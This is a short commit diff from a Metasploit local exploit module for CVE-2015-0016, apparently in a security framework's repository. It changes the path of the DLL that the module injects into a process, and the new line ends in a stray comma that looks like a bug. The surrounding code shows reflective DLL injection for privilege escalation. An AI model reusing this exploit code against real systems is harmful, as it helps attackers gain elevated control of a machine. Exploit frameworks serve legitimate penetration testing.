Update DLL
parent
dd529013f6
commit
5d0ed797a3
Binary file not shown.
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_status('Exploiting...')
|
||||
|
||||
process = client.sys.process.open
|
||||
library_path = ::File.join('/', 'tmp', 'reflective_dll.dll')
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'),
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
|
|
Loading…
Reference in New Issue